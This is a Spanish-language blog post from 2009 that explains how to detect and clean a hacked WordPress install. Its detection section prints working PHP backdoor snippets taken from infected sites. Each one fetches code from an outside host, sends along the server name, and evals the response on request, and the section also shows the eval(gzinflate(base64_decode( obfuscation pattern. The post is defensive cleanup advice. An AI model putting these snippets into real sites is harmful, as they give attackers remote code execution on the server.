July 16, 2009, Author: Iliass, Leave a comment

Eval : Wordrpess hacked – haqueado eval(gzinflate(base64_decode(

Categories: critica social, wordpess

Eval : Wordrpess hacked – haqueado

Como sabeis, wordpres es un código abierto y sus plugins también. Normalmente, no tiene porque pasar nada, pero últimamente, muchísimos  usuarios estan encontrando cosas raras en sus blogs, como que la pagina principal se redirecciona a webs de spam ( viagra , alargar penes etc…) o que  a la hora de querer editar la plantilla, te pide un usuario y una contraseña.

Eso significa claramente que tu wordpress esta comprometido, desde una simple inyección de código que tiene como objetivo desviar trafico a otras webs de spam, hasta una intrusión completa con toda regla, de un usuario que se mete como administrador.

Eso ultimo lo puedes comprobar si tu instalación lo permite en las tablas de Sql de tu base de datos, mirar en wp-option, wp-users, y mirar si hay uno nuevo a parte del tuyo.

Como detectar que tu wordpress esta entre manos de otros ?

- Cuando das click a tu enlace desde google o otro buscador, sales en otra web totalmente diferente, lo que consiguen con eso es ganar puntos y valor en las búsquedas de google.

- Lo mismo te pasa cuando das un click en el RSS

- Los que visitan tu blog y no tienen ni cookie ni login, seran redireccionados tambien a los sitios spam

- Si miras bien en las carpetas de uploads, veras algun fichero de este tipo :/uploads/2008/06/06/abcdefghijklmn.jpg o dentro de las imagenes del tema.

- En las tablas de tu base de datos, puedes encontrar una entrada tipo rss_f541b3abd05e7962fcab37737f40fad8, que realmente lo que hace es activar la imagen como plugin.

- Puedes encontrar en los ficheros php de tu wordpress lineas de codigo tipo eval() or base64_decode() :

if(isset($_GET['p'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
fclose ($sock);}
}

if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

eval(gzinflate(base64_decode(

Como solucionarlo ?

- lo primero es hacer una copia de tu base de datos.

- Busca por ftp si hay rasgo de imágenes sospechosas y borrarlas.

- A traves de my php admin, mira los plugins activos y compara los que tienes activos en wordpress, si ves algunos sospechoso, borralo.

- limpia las cabeceras de header e index de cualquier tipo de código raro.

-Busca en los usuarios si hay alguno que no te suena, o en la base de datos, si hay alguno con valor nulo, y borralo.

- Cambia todos los ficheros de WordPress con unos limpios y actualiza a la ultima version

- Crea un archivo index.html vacio y ponlo en la carpeta de plugins, asi la tapas.

CAMBIA TODAS TUS CONTRASEÑAS , PORQUE LO MAS PROBABLE ES QUE YA NO SON SOLO TUYAS ¡

- Y si quieres saber que lleva el codigo maligno, copialo y pega en esta pagina, y te de decriptara con suerte

Este video te acalara un poco como hacerlo:

Related posts:

Puerto valencia / Valencia port
HELMUT FRITZ : se puede hacer critica social desde la musica Dance
Editorial: "Crisis económica: En el ojo del huracán"

Leave a Reply

Your email address will not be published. Required fields are marked *

*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

*
To prove you're a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.
Click to hear an audio file of the anti-spam word

«
»